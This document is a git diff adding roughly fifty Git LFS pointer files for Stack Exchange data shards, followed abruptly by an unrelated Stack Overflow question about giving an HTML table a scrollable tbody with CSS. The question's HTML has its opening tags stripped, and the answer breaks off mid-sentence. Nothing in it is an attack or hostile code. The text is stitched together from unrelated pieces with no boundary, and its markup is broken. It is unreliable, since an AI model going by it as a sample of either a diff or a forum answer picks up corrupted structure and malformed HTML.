b/data/stackexchange/1-1/958_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c32abb339ae36add5e61a8480769a8913dadd1a4 --- /dev/null +++ b/data/stackexchange/1-1/958_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:84d7da010f5389f1737f321b554d06456a0a9aad8726a128718e7f7404affa05 +size 34685288 diff --git a/data/stackexchange/1-1/959_2289.jsonl b/data/stackexchange/1-1/959_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e9566d9ef570fd3a3ed5b1e435502aa859fdf3e --- /dev/null +++ b/data/stackexchange/1-1/959_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c97e9b5f0a49378b39d860705adca35cbd8d62a6f71d38ca6a7d476eca311854 +size 34301964 diff --git a/data/stackexchange/1-1/95_2289.jsonl b/data/stackexchange/1-1/95_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..86be435d78e8cd610455d19ae71a4bc477d7e8bc --- /dev/null +++ b/data/stackexchange/1-1/95_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6feadce2fcc357e92e5c1ca5d84e1475bb79ba1c75e3ea1ead41b974df77c1e7 +size 38967060 diff --git a/data/stackexchange/1-1/960_2289.jsonl b/data/stackexchange/1-1/960_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a8983bf6c804f7a7a4fda26dea2314f4a0f0476 --- /dev/null +++ b/data/stackexchange/1-1/960_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:22484299e6d21c65a588352770a75eed5f3eaa1114c82ba6d8ced801a1fd36d4 +size 34779580 diff --git a/data/stackexchange/1-1/961_2289.jsonl b/data/stackexchange/1-1/961_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96f21fb5c86307b86fe1110144811f1b0e4cc436 --- /dev/null +++ b/data/stackexchange/1-1/961_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2256a502459a1b70aadc8d54c9f1706296d5f9e77e91ebb56d5ea5a1b916479c +size 34536169 diff --git a/data/stackexchange/1-1/962_2289.jsonl b/data/stackexchange/1-1/962_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9d72260c14b98c55155ca9799f8b635d50fa3cfd --- /dev/null +++ b/data/stackexchange/1-1/962_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aec0554e5805c10ce6ed9552a38964c1ca010ae90d39da606df20fbc4741aacb +size 35322025 diff --git a/data/stackexchange/1-1/963_2289.jsonl b/data/stackexchange/1-1/963_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91f87ae0485b1208d467ebb322093d975397a26b --- /dev/null +++ b/data/stackexchange/1-1/963_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fad63984384419a312f0bf7cea0d2dd5e39a008ae9a06f7c19259082852c98a4 +size 34495927 diff --git a/data/stackexchange/1-1/964_2289.jsonl b/data/stackexchange/1-1/964_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed6c26ddffd746fb56c414d9663f0c186c4547c6 --- /dev/null +++ b/data/stackexchange/1-1/964_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d7887852f3166e7ae0e74cca77b5de4aedc5cb6217431596ee70828c4daf939 +size 34995690 diff --git a/data/stackexchange/1-1/965_2289.jsonl b/data/stackexchange/1-1/965_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b3e5252dbdd6cfac6ed893be516c28acbb4f55c3 --- /dev/null +++ b/data/stackexchange/1-1/965_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c150b35b85932f7d026818a12780d201f40acd5d977eabc43b4452ab2445c0e7 +size 34566631 diff --git a/data/stackexchange/1-1/966_2289.jsonl b/data/stackexchange/1-1/966_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8aea897e88f5d4ae1515f47cb0260fb69718bc8a --- /dev/null +++ b/data/stackexchange/1-1/966_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c29dc7f6b0223822e44f4b48edc3329a5f9d20013fd58dad9960c4ebef69cb0 +size 35091688 diff --git a/data/stackexchange/1-1/967_2289.jsonl b/data/stackexchange/1-1/967_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f5db011ff27c6ffe3c65a5238c308f9523796493 --- /dev/null +++ b/data/stackexchange/1-1/967_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0558f5e58b6568cded23a93409fc03ba3dd0e41c61b09f7afe6fff29542da4c8 +size 34940797 diff --git a/data/stackexchange/1-1/968_2289.jsonl b/data/stackexchange/1-1/968_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..693c5c6ffaae5686e1e67e99e71a2144e8487b53 --- /dev/null +++ b/data/stackexchange/1-1/968_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9534de7cde275a632cac7decb76250281b7842eef1c4d3eff7154ecc29d15e2d +size 34432024 diff --git a/data/stackexchange/1-1/969_2289.jsonl b/data/stackexchange/1-1/969_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b8ceb63bf817debafdef7ee6e20bfe09b623d371 --- /dev/null +++ b/data/stackexchange/1-1/969_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1147c2f43c67d3160d0775274ef8cbff94900b854c90b3276c9039286c220fb8 +size 34412781 diff --git a/data/stackexchange/1-1/96_2289.jsonl b/data/stackexchange/1-1/96_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..02338c03fad068dabd34fb8d863c604a9614c982 --- /dev/null +++ b/data/stackexchange/1-1/96_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da1db89e02e67dcd713700da5c3445b1eab875d7399fa8ea54e1f54efa8c9d92 +size 39066914 diff --git a/data/stackexchange/1-1/970_2289.jsonl b/data/stackexchange/1-1/970_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a3500eb79d0b47ec2e5b2ad446333f8b6c06fa5e --- /dev/null +++ b/data/stackexchange/1-1/970_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:57bd4a4f63f720a3c462c0e621d14cac4be92508829033dee44a5b9dc1871f10 +size 34395386 diff --git a/data/stackexchange/1-1/971_2289.jsonl b/data/stackexchange/1-1/971_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9acaa083d6bbdedc423470c5201ed7880ad21f62 --- /dev/null +++ b/data/stackexchange/1-1/971_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dac2421e3847a265c0e59b3a2a67bef725b1d6dc66712bbce2a4fdb2be86167f +size 34707100 diff --git a/data/stackexchange/1-1/972_2289.jsonl b/data/stackexchange/1-1/972_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..53d1704af88eafe74ba1bc995dc9c20d67eafceb --- /dev/null +++ b/data/stackexchange/1-1/972_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:98f41942944abc1d831bf7b64b81add960c75463b46054ce89e8ab4b1ef4fc0e +size 34517294 diff --git a/data/stackexchange/1-1/973_2289.jsonl b/data/stackexchange/1-1/973_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed4eb3c2e7a7d09d6fbc43112c8f55c86e9b3d99 --- /dev/null +++ b/data/stackexchange/1-1/973_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46fd38d42f9418721260563d4c571b05e79119572f0fb48e7de6caaef0c01610 +size 34402624 diff --git a/data/stackexchange/1-1/974_2289.jsonl b/data/stackexchange/1-1/974_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3d93461a8c0c7cf194569ecd50a20e7e4e116bfb --- /dev/null +++ b/data/stackexchange/1-1/974_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0e5bd56b89849f3b45058b697de4a108e6d4a2c46f7aca3cdd682be2778982d +size 34718595 diff --git a/data/stackexchange/1-1/975_2289.jsonl b/data/stackexchange/1-1/975_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..64984c663f5a6e5def5d3a2f10488e8690162c92 --- /dev/null +++ b/data/stackexchange/1-1/975_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6167f15bff21b1b08e969c971a0e0736c73db9e43ac0f6913064ea7f08145236 +size 34862811 diff --git a/data/stackexchange/1-1/976_2289.jsonl b/data/stackexchange/1-1/976_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a44d6ef953d119253e51c15a8526e2de593bc090 --- /dev/null +++ b/data/stackexchange/1-1/976_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ed766b1f5b134f766b02e5ab483bf9b411a731aaa8103490915f288177d4f6a +size 34704173 diff --git a/data/stackexchange/1-1/977_2289.jsonl b/data/stackexchange/1-1/977_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bda5db225dd8f384bcb607f9db05e69a40360708 --- /dev/null +++ b/data/stackexchange/1-1/977_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9d7c78de0a28602f73a8aaae811ac6f27c2d4236eec2cb2c802931dcc508be9 +size 34834658 diff --git a/data/stackexchange/1-1/978_2289.jsonl b/data/stackexchange/1-1/978_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3f9647b169fa11e9d25849fbc62ee9e68f26dc68 --- /dev/null +++ b/data/stackexchange/1-1/978_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1fb167fa3bc3f044f1759a33ee41a2af46121e09f8ef402df4ff34ab3c5f8fb0 +size 34274146 diff --git a/data/stackexchange/1-1/979_2289.jsonl b/data/stackexchange/1-1/979_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..233279429bba4262245aa1a31676f10fd285a41e --- /dev/null +++ b/data/stackexchange/1-1/979_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:52bc15c9b3722cb359e2488d4f842d581e38d57d7e4bcc4859e867422249abe2 +size 35072232 diff --git a/data/stackexchange/1-1/97_2289.jsonl b/data/stackexchange/1-1/97_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..873a27cc5a409fb40429948b5704e8dd5d9f1129 --- /dev/null +++ b/data/stackexchange/1-1/97_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cbc40f0ae6b37cdaa5add1b8f1ba19dd27270a2cb96a81420163de948f2194ef +size 38583437 diff --git a/data/stackexchange/1-1/980_2289.jsonl b/data/stackexchange/1-1/980_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5ef908af69b7a4fdb9ecccc57cd12f5d6820339f --- /dev/null +++ b/data/stackexchange/1-1/980_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7e430ae3df4d54b13873a3e9188bb5383edb19a091aa448f67d83e1534b93ec2 +size 34467887 diff --git a/data/stackexchange/1-1/981_2289.jsonl b/data/stackexchange/1-1/981_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c60311943a6a052854c07039628e88a968a30e8f --- /dev/null +++ b/data/stackexchange/1-1/981_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:56f4e4fc9d888f7661951895b9008e3b2a0b8a2734684f7e8b701b465bebf2a7 +size 34985113 diff --git a/data/stackexchange/1-1/982_2289.jsonl b/data/stackexchange/1-1/982_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d93ce827f7daf04b6b579bd07a32093da970e0b1 --- /dev/null +++ b/data/stackexchange/1-1/982_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e6c82805e79035de87c0d2727e6274c1d24acac02b477c48c38817bdb7e9ddf4 +size 34800693 diff --git a/data/stackexchange/1-1/983_2289.jsonl b/data/stackexchange/1-1/983_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cf8bacd79dac8341f9abb7542e92fd1d0dcd1b12 --- /dev/null +++ b/data/stackexchange/1-1/983_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4224c791a57f9816337fa47abe62b0ac1c2567cf2e9b8775f2002bd7ee4582c5 +size 34242085 diff --git a/data/stackexchange/1-1/984_2289.jsonl b/data/stackexchange/1-1/984_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..da3bd1265aff43e426ca85af9e2c5efee8ea2cfb --- /dev/null +++ b/data/stackexchange/1-1/984_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6dcfb8e8c536d8cbed9cd3085ad8f645dc57771b0ca7b7b5c4dc1c681e65f9c6 +size 35593427 diff --git a/data/stackexchange/1-1/985_2289.jsonl b/data/stackexchange/1-1/985_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e2e9212ec0d4af3d5f6d0b3e8092b9939e90db33 --- /dev/null +++ b/data/stackexchange/1-1/985_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5ed05247818f57d9875f373f5a537c5d86b3636ab529c4d7c9181b347700b17 +size 34664799 diff --git a/data/stackexchange/1-1/986_2289.jsonl b/data/stackexchange/1-1/986_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4039daf4512ea922d67580966d60e0d81b5dd2ce --- /dev/null +++ b/data/stackexchange/1-1/986_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:513b14f632c4b54b24c176ced3a6dc918984d819a8ec0837829055ff6948b601 +size 34801627 diff --git a/data/stackexchange/1-1/987_2289.jsonl b/data/stackexchange/1-1/987_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c8398ae3b7f3f1d2144f1859d7ad3bb4571e92bb --- /dev/null +++ b/data/stackexchange/1-1/987_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:99338c80984bbd77c28295bcd035f044eebeb52230000e4344a089557e236050 +size 34345515 diff --git a/data/stackexchange/1-1/988_2289.jsonl b/data/stackexchange/1-1/988_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca6ba1c2b6e1ff885763e1996ff1388184a77c7c --- /dev/null +++ b/data/stackexchange/1-1/988_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba24543b1d57d48afdc5c8908125220305ddbe520298ab8686635d185ecf2be5 +size 34981447 diff --git a/data/stackexchange/1-1/989_2289.jsonl b/data/stackexchange/1-1/989_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63bc3c0df9d59b2c412313ea55f595e786043163 --- /dev/null +++ b/data/stackexchange/1-1/989_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f19b5a5bf47dd6242d727b20eb7e9506f151bb6fecbfe50a0b0b19a47aef2218 +size 34509381 diff --git a/data/stackexchange/1-1/98_2289.jsonl b/data/stackexchange/1-1/98_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1d7251468e4094335ce84b0bcf03f079c18c7fb1 --- /dev/null +++ b/data/stackexchange/1-1/98_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9c9789d19fcbc3960a5e7160ad2e74dffeec9ffa43861c08fd34e04074f7d75b +size 38836843 diff --git a/data/stackexchange/1-1/990_2289.jsonl b/data/stackexchange/1-1/990_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a5e9ef0d05f5b576cf67f08a1a88072a801e6d72 --- /dev/null +++ b/data/stackexchange/1-1/990_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:55951517c28827a3b8e70651a01123b506388d71f85e2d2b3ba2ad8d5df5999f +size 34657652 diff --git a/data/stackexchange/1-1/991_2289.jsonl b/data/stackexchange/1-1/991_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e696dcdfb6ec0df1dcd148b98ec9d90d5e657406 --- /dev/null +++ b/data/stackexchange/1-1/991_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6e626a7f38f15df88e6630380547ad47d86dac41539cc64103ca0d95af21eedc +size 34516000 diff --git a/data/stackexchange/1-1/992_2289.jsonl b/data/stackexchange/1-1/992_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..418918ae55c3a517987dba2300f79c17cdc32412 --- /dev/null +++ b/data/stackexchange/1-1/992_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5f80a338dab6b338b0b679104f34c6f6b46f505eb675c8b74f1737f9b3465ad6 +size 35126898 diff --git a/data/stackexchange/1-1/993_2289.jsonl b/data/stackexchange/1-1/993_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5a96ecf92e5db384c32c3f87113c854048e76de7 --- /dev/null +++ b/data/stackexchange/1-1/993_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d0e4a5d75e0fc6a4c03dcf4a2655e8e56b6ed8d09f68c6edc06b4614a1e44fe +size 34236814 diff --git a/data/stackexchange/1-1/994_2289.jsonl b/data/stackexchange/1-1/994_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..abee12b1be1a005a1b51944085b81ad43f35205e --- /dev/null +++ b/data/stackexchange/1-1/994_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e6a735d238823bbc670ff9dda76a977cfcc04480d7264270ffe973996c5b9dc0 +size 35315777 diff --git a/data/stackexchange/1-1/995_2289.jsonl b/data/stackexchange/1-1/995_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a764a5b8b2ac229abb31bc47ac6716cb6ce8137 --- /dev/null +++ b/data/stackexchange/1-1/995_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a2be41eac230aa9e4823eecfd3ccb73685890a76b4d4521d205a0abd7a196404 +size 34151208 diff --git a/data/stackexchange/1-1/996_2289.jsonl b/data/stackexchange/1-1/996_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..03af3a50b798a988dce2b932b55dccde69975018 --- /dev/null +++ b/data/stackexchange/1-1/996_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d90b42f2ebeaea851bdc58f7b553150d77c3ac13cc8d4abcdc97539cb74cfd79 +size 34892655 diff --git a/data/stackexchange/1-1/997_2289.jsonl b/data/stackexchange/1-1/997_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c2a98ca5c07defb1d5321f5f160e4a8cf65b2c26 --- /dev/null +++ b/data/stackexchange/1-1/997_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f8c704bfa17b0234d091a57a756c5088e642a03a278cba6f363f7992562e48a9 +size 34876634 diff --git a/data/stackexchange/1-1/998_2289.jsonl b/data/stackexchange/1-1/998_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2bd66169ffb2e299f7e9c995c60a02322e0ec2cc --- /dev/null +++ b/data/stackexchange/1-1/998_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:56c74259fad71798186f1fd2faf85653a79f16c20f489a3861fdb1b27db373d4 +size 34677270 diff --git a/data/stackexchange/1-1/999_2289.jsonl b/data/stackexchange/1-1/999_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..14f777bc4b64a1b40b4d74932cc189735aafd442 --- /dev/null +++ b/data/stackexchange/1-1/999_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:25b29e4698b99f03957c9d084bfa95dfbb31db084bd08b5cc72b9549dcf780e7 +size 34892752 diff --git a/data/stackexchange/1-1/99_2289.jsonl b/data/stackexchange/1-1/99_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8309abe8c5b65533d8988112ed9ee9d79f8b0853 --- /dev/null +++ b/data/stackexchange/1-1/99_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:453de4912e5558b5a6f3330afaf9ae8926a0fdb7c7b88a92e12578bbce3ebd04 +size 39769530 diff --git a/data/stackexchange/1-1/9_2289.jsonl b/data/stackexchange/1-1/9_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3c70ea9607070dc81717f23be7b3b65f036b237e --- /dev/null +++ b/data/stackexchange/1-1/9_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93a5755edcaa912d8c177aae3361b7671e76e311b1e9193b91ad242950f353ff +size 35684040
Name <\/i>\n <\/th>\n Web Address <\/i>\n <\/th>\n Office Location <\/i>\n <\/th>\n Configuration <\/i>\n <\/th>\n Status <\/i>\n <\/th>\n Queue <\/i>\n <\/th>\n Action<\/span> \n <\/th>\n <\/tr>\n <\/thead>\n
Tester A<\/td>\n bat-1.sj<\/td>\n California<\/td>\n Normal config.<\/td>\n Online<\/td>\n 5 Jobs<\/td>\n Connect<\/a>\n\n <\/td>\n <\/tr>\n
Tester B<\/td>\n bat-1.sj<\/td>\n California<\/td>\n Normal config.<\/td>\n Online<\/td>\n 9 Jobs<\/td>\n Connect<\/a>\n\n <\/td>\n <\/tr>\n
Tester C<\/td>\n bat-1.sj<\/td>\n California<\/td>\n Normal config.<\/td>\n Online<\/td>\n 2 Jobs<\/td>\n Connect<\/a>\n\n <\/td>\n <\/tr>\n
Tester D<\/td>\n bat-1.sj<\/td>\n California<\/td>\n Normal config.<\/td>\n Online<\/td>\n 4 Jobs<\/td>\n Connect<\/a>\n\n <\/td>\n <\/tr>\n
Tester E<\/td>\n bat-1.sj<\/td>\n California<\/td>\n Normal config.<\/td>\n Online<\/td>\n 7 Jobs<\/td>\n Connect<\/a>\n\n <\/td>\n <\/tr>\n
Tester F<\/td>\n bat-1.sj<\/td>\n California<\/td>\n Normal config.<\/td>\n Online<\/td>\n 5 Jobs<\/td>\n Connect<\/a>\n\n <\/td>\n <\/tr>\n
Tester G<\/td>\n bat-1.sj<\/td>\n California<\/td>\n Normal config.<\/td>\n Online<\/td>\n 11 Jobs<\/td>\n Connect<\/a>\n\n <\/td>\n <\/tr>\n
Tester H<\/td>\n bat-1.sj<\/td>\n California<\/td>\n Normal config.<\/td>\n Online<\/td>\n 6 Jobs<\/td>\n Connect<\/a>\n\n <\/td>\n <\/tr>\n
Tester I<\/td>\n bat-1.sj<\/td>\n California<\/td>\n Normal config.<\/td>\n Online<\/td>\n 3 Jobs<\/td>\n Connect<\/a>\n\n <\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<\/code>\nCSS<\/code>:\ntable.scroll {\n width: 100%;\n \/* Optional *\/\n \/* border-collapse: collapse; *\/\n border-spacing: 0;\n border: 2px solid black;\n}\ntable.scroll tbody, table.scroll thead {\n display: block;\n}\nthead tr th {\n height: 30px;\n line-height: 30px;\n \/*text-align: left;*\/\n}\ntable.scroll tbody {\n height: 100px;\n overflow-y: auto;\n overflow-x: hidden;\n}\ntbody {\n border-top: 2px solid black;\n}\ntbody td, thead th {\n width:auto;\n \/* Optional *\/\n border-right: 1px solid black;\n}\ntbody td:last-child, thead th:last-child {\n border-right: none;\n}\n<\/code>\nHere's my JSFiddle\nComment: you cannot control the height of a table. thus you cannot apply overflow: hidden to it. you apply display: block so your browser accepts height, but you lose the regular table behaviour with this as well.\nComment: Hi There, welcome to stackoverflow. Thank you for including some example code of your work. I recommend trying to use the **snippet** option within the text editor to show your code.\nAnswer: It seems you want to fix<\/code> your